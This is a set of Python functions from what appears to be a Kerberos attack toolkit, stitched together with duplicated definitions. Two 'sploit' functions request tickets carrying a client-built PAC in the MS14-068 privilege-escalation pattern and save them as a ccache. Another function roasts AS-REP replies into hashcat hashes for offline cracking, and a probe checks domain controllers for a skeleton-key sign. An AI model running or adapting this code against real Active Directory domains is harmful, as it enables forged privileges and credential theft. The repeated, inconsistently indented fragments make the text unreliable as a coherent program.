def net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a):
    """Send one AS-REQ to ``kdc_a`` and stash the raw AS-REP (hex) in ``krbTricks.set_arg``.

    The reply is not parsed here. It is hex-encoded and stored under
    ``net_krbas_tgs`` when ``set_arg['pre']`` is True, otherwise under
    ``net_krbas``. ``user_sid`` is accepted for call-site symmetry only and is
    not used. Progress lines go to stderr.

    NOTE(review): ``set_arg['padata_type']`` is read unconditionally when the
    request is built, so if ``'pre'`` is absent the caller must already have
    set it or this raises KeyError — confirm against callers.
    """
    args = krbTricks.set_arg
    # 'pre' picks the pre-auth padata type: 2 (presumably PA-ENC-TIMESTAMP)
    # when set, 149 otherwise.
    if 'pre' in args:
        args['padata_type'] = 2 if args['pre'] == True else 149

    def step(msg):
        sys.stderr.write(msg)
        sys.stderr.flush()

    step('  [+] Building AS-REQ for %s@%s...' % (user_name, user_realm))
    nonce = getrandbits(31)
    now = time()
    as_req = build_as_req(user_realm, user_name, user_key, now, nonce, False, args['padata_type'])
    sys.stderr.write(' Done!\n')

    step('  [+] Sending AS-REQ to %s...' % kdc_a)
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    step('  [+] Receiving AS-REP from %s...' % kdc_a)
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    # Keep the raw reply for later stages; the slot depends on the 'pre' flag.
    hdata = binascii.b2a_hex(data)
    slot = 'net_krbas_tgs' if args.get('pre') == True else 'net_krbas'
    args[slot] = hdata
 def check(self, domain, dc_name, account):
     """Probe ``dc_name.domain`` with an AES256-only AS-REQ for ``account``.

     A KDC answering KDC_ERR_ETYPE_NOSUPP to an AES256-only request is what
     the original TODO flags as a possible "skeleton key" (the Chinese
     comment reads roughly "skeleton key found") — presumably because the DC
     has been downgraded to weaker etypes; treat that as a hypothesis to
     confirm. The error code is printed; nothing is returned to the caller
     yet. Timeouts and refused connections are ignored; any other failure
     (e.g. the reply not decoding as a KRB-ERROR) is printed with a traceback.
     """
     kdc_host = "{dc_name}.{domain}".format(dc_name=dc_name, domain=domain)
     # No key (None): we only want the KDC's reaction to the etype, not a TGT.
     request = build_as_req(get_netbios_domain(domain), account, None,
                            time(), getrandbits(31), True, AES256)
     try:
         reply = recv_rep(send_req(request, kdc_host))
         krb_err = decode(reply, asn1Spec=KrbError())[0]
         print(krb_err['error-code'])
         if krb_err['error-code'] == KDC_ERR_ETYPE_NOSUPP:
             # TODO: possible skeleton key — report this to the caller
             # instead of returning None.
             return
     except (timeout, ConnectionRefusedError):
         pass
     except Exception:
         traceback.print_exc()
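def sploit(user_realm,
           user_name,
           user_sid,
           user_key,
           kdc_a,
           kdc_b,
           target_realm,
           target_service,
           target_host,
           output_filename,
           krbtgt_a_key=None,
           trust_ab_key=None,
           target_key=None):
    """Get a TGT from ``kdc_a``, swap it for a cross-realm ticket that carries a
    client-built PAC, optionally fetch a service ticket from ``kdc_b``, and
    save the final credential to ``output_filename`` as a ccache.

    Flow (progress is written to stderr):
      1. AS-REQ to ``kdc_a`` as ``user_name@user_realm`` with ``pac_request=False``;
         the AS-REP is decrypted with ``user_key``.
      2. TGS-REQ to ``kdc_a`` for ``krbtgt/target_realm`` using that TGT, with a
         PAC built locally from ``user_sid`` and the AS-REP ``authtime`` attached
         as AD_WIN2K_PAC authorization data. The PAC is supplied by the client,
         not issued by the KDC — the shape of a PAC-forgery test such as
         MS14-068; presumably that is the point of the tool.
      3. If ``target_service``, ``target_host`` and ``kdc_b`` are all given,
         TGS-REQ to ``kdc_b`` for ``target_service/target_host`` with the
         cross-realm ticket; otherwise the cross-realm ticket itself is saved.

    ``krbtgt_a_key``, ``trust_ab_key`` and ``target_key`` are optional debug
    keys: when given, the matching reply is pretty-printed to stderr and its
    ticket handed to ``ticket_debug`` with that key.

    Fix: the ``krbtgt_a_key`` debug branch wrote to ``sys.sdterr`` (typo), so
    enabling it raised AttributeError before printing anything. The debug
    output now uses ``sys.stderr.write`` (same text, newline-terminated).
    """

    def step(msg):
        sys.stderr.write(msg)
        sys.stderr.flush()

    def done():
        sys.stderr.write(' Done!\n')

    def exchange(req, kdc, kind):
        # One request/reply round trip with the usual progress lines.
        step('  [+] Sending %s-REQ to %s...' % (kind, kdc))
        sock = send_req(req, kdc)
        done()
        step('  [+] Receiving %s-REP from %s...' % (kind, kdc))
        reply = recv_rep(sock)
        done()
        return reply

    def dump(rep, rep_enc, ticket, key):
        # Debug aid: show a reply and decrypt its ticket with a known key.
        sys.stderr.write(rep.prettyPrint() + '\n')
        sys.stderr.write(rep_enc.prettyPrint() + '\n')
        ticket_debug(ticket, key)

    # --- 1. AS exchange with kdc_a: TGT for user_realm ---------------------
    step('  [+] Building AS-REQ for %s...' % kdc_a)
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm,
                          user_name,
                          user_key,
                          current_time,
                          nonce,
                          pac_request=False)
    done()

    data = exchange(as_req, kdc_a, 'AS')

    step('  [+] Parsing AS-REP from %s...' % kdc_a)
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    session_key = (int(as_rep_enc['key']['keytype']),
                   str(as_rep_enc['key']['keyvalue']))
    # The KDC's authtime becomes the logon time stamped into our PAC.
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    done()

    if krbtgt_a_key is not None:
        dump(as_rep, as_rep_enc, tgt_a, krbtgt_a_key)

    # --- 2. TGS exchange with kdc_a: cross-realm ticket, PAC built here ----
    step('  [+] Building TGS-REQ for %s...' % kdc_a)
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid,
                                   logon_time))
    tgs_req = build_tgs_req(user_realm,
                            'krbtgt',
                            target_realm,
                            user_realm,
                            user_name,
                            tgt_a,
                            session_key,
                            subkey,
                            nonce,
                            current_time,
                            pac,
                            pac_request=False)
    done()

    data = exchange(tgs_req, kdc_a, 'TGS')

    step('  [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']),
                    str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    done()

    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        dump(tgs_rep, tgs_rep_enc, tgt_b, trust_ab_key)

    # --- 3. Optional TGS exchange with kdc_b: service ticket ---------------
    if target_service is not None and target_host is not None and kdc_b is not None:
        step('  [+] Building TGS-REQ for %s...' % kdc_b)
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host,
                                 user_realm, user_name, tgt_b, session_key2,
                                 subkey, nonce, current_time)
        done()

        data = exchange(tgs_req2, kdc_b, 'TGS')

        step('  [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        done()
    else:
        # Nothing to ask kdc_b for: the cross-realm ticket is the deliverable.
        tgs_rep2, tgs_rep_enc2 = tgs_rep, tgs_rep_enc

    step('  [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    cc.add_credential(kdc_rep2ccache(tgs_rep2, tgs_rep_enc2))
    cc.save(output_filename)
    done()

    if target_key is not None:
        dump(tgs_rep2, tgs_rep_enc2, tgs_rep2['ticket'], target_key)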
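def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host,
           output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    """Get a TGT from ``kdc_a``, exchange it for a cross-realm ticket carrying a
    client-built PAC, optionally get a service ticket from ``kdc_b``, and save
    the final credential to ``output_filename`` as a ccache.

    Steps (progress on stderr):
      1. AS-REQ to ``kdc_a`` for ``user_name@user_realm`` (``pac_request=False``),
         AS-REP decrypted with ``user_key``.
      2. TGS-REQ to ``kdc_a`` for ``krbtgt/target_realm`` with that TGT plus a PAC
         built locally from ``user_sid`` and the AS-REP ``authtime``
         (AD_WIN2K_PAC). The PAC comes from the client, not the KDC — the shape
         of a PAC-forgery test such as MS14-068; presumably the tool's purpose.
      3. If ``target_service``, ``target_host`` and ``kdc_b`` are all given,
         TGS-REQ to ``kdc_b`` for ``target_service/target_host`` with the
         cross-realm ticket; otherwise that ticket itself is saved.

    ``krbtgt_a_key``, ``trust_ab_key`` and ``target_key`` are optional debug
    keys: when given, the matching reply is pretty-printed to stderr and the
    ticket passed to ``ticket_debug``.

    Fix: the ``krbtgt_a_key`` debug branch wrote to ``sys.sdterr`` (typo) and
    raised AttributeError as soon as it was enabled; debug output now goes
    through ``sys.stderr.write`` (same text, newline-terminated).
    """

    def say(msg):
        sys.stderr.write(msg)
        sys.stderr.flush()

    def show(rep, rep_enc, ticket, key):
        # Debug aid: dump a reply and decrypt its ticket with a known key.
        sys.stderr.write(rep.prettyPrint() + '\n')
        sys.stderr.write(rep_enc.prettyPrint() + '\n')
        ticket_debug(ticket, key)

    # 1. AS exchange: TGT for user_realm.
    say('  [+] Building AS-REQ for %s...' % kdc_a)
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
    sys.stderr.write(' Done!\n')

    say('  [+] Sending AS-REQ to %s...' % kdc_a)
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    say('  [+] Receiving AS-REP from %s...' % kdc_a)
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    say('  [+] Parsing AS-REP from %s...' % kdc_a)
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
    # The KDC's authtime becomes the logon time stamped into our PAC.
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    sys.stderr.write(' Done!\n')

    if krbtgt_a_key is not None:
        show(as_rep, as_rep_enc, tgt_a, krbtgt_a_key)

    # 2. TGS exchange at kdc_a: cross-realm ticket with a PAC we built.
    say('  [+] Building TGS-REQ for %s...' % kdc_a)
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
    tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
                            tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
    sys.stderr.write(' Done!\n')

    say('  [+] Sending TGS-REQ to %s...' % kdc_a)
    sock = send_req(tgs_req, kdc_a)
    sys.stderr.write(' Done!\n')

    say('  [+] Receiving TGS-REP from %s...' % kdc_a)
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    say('  [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    sys.stderr.write(' Done!\n')

    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        show(tgs_rep, tgs_rep_enc, tgt_b, trust_ab_key)

    # 3. Optional TGS exchange at kdc_b for the service ticket.
    if target_service is not None and target_host is not None and kdc_b is not None:
        say('  [+] Building TGS-REQ for %s...' % kdc_b)
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
                                tgt_b, session_key2, subkey, nonce, current_time)
        sys.stderr.write(' Done!\n')

        say('  [+] Sending TGS-REQ to %s...' % kdc_b)
        sock = send_req(tgs_req2, kdc_b)
        sys.stderr.write(' Done!\n')

        say('  [+] Receiving TGS-REP from %s...' % kdc_b)
        data = recv_rep(sock)
        sys.stderr.write(' Done!\n')

        say('  [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        sys.stderr.write(' Done!\n')
    else:
        # Nothing to ask kdc_b for: the cross-realm ticket is what gets saved.
        tgs_rep2, tgs_rep_enc2 = tgs_rep, tgs_rep_enc

    say('  [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    cc.add_credential(kdc_rep2ccache(tgs_rep2, tgs_rep_enc2))
    cc.save(output_filename)
    sys.stderr.write(' Done!\n')

    if target_key is not None:
        show(tgs_rep2, tgs_rep_enc2, tgs_rep2['ticket'], target_key)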
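def sploit(user_realm,
           user_name,
           user_key,
           kdc_a,
           kdc_b,
           target_realm,
           target_service,
           target_host,
           output_filename,
           krbtgt_a_key=None,
           trust_ab_key=None,
           target_key=None):
    """AS-REP-roast ``user_name@user_realm`` against ``kdc_a``.

    Sends one AS-REQ (``pac_request=True``), passes the reply through
    ``decrypt_as_rep`` with ``user_key`` and emits the AS-REP enc-part in
    hashcat's ``$krb5asrep$23$user@REALM:<checksum>$<cipher>`` form — once on
    stderr and once appended to ``hashcat.out`` in the working directory.

    Only ``user_realm``, ``user_name``, ``user_key`` and ``kdc_a`` are used; the
    other parameters are kept so the signature matches the full ticket flow
    this was cut down from (the TGS/ccache stage is gone). ``output_filename``
    is NOT honoured — the hash file path is still hard-coded, as the original
    "atm" comment noted.

    Assumptions to confirm (not visible here): ``decrypt_as_rep`` must return
    the raw enc-part bytes as its second value (it is iterated with ``ord``),
    and etype ``23`` (RC4-HMAC) is hard-wired into the tag — if the KDC answers
    with an AES etype the line will not be in hashcat's etype-23 format.

    Changes: the nonce is random again (the fixed 12381973 gave every request
    an identical, fingerprintable nonce), the output file is handled with a
    ``with`` block so it is closed on error too, and the local no longer
    shadows the builtin ``file``.
    """
    sys.stderr.write('  [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm,
                          user_name,
                          user_key,
                          current_time,
                          nonce,
                          pac_request=True)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    sys.stderr.write(' Done!\n')

    # hashcat wants "<16-byte checksum>$<rest of enc-part>", all lowercase hex.
    enc_hex = "".join("{:02x}".format(ord(c)) for c in as_rep_enc)
    hashcat_enc = enc_hex[:32] + '$' + enc_hex[32:]
    hash_line = '$krb5asrep$23$%s@%s:%s\n' % (user_name, user_realm, hashcat_enc)
    sys.stderr.write(hash_line)

    # Output path is still hard-coded (see docstring); append so runs accumulate.
    with open("hashcat.out", "a") as out:
        out.write(hash_line)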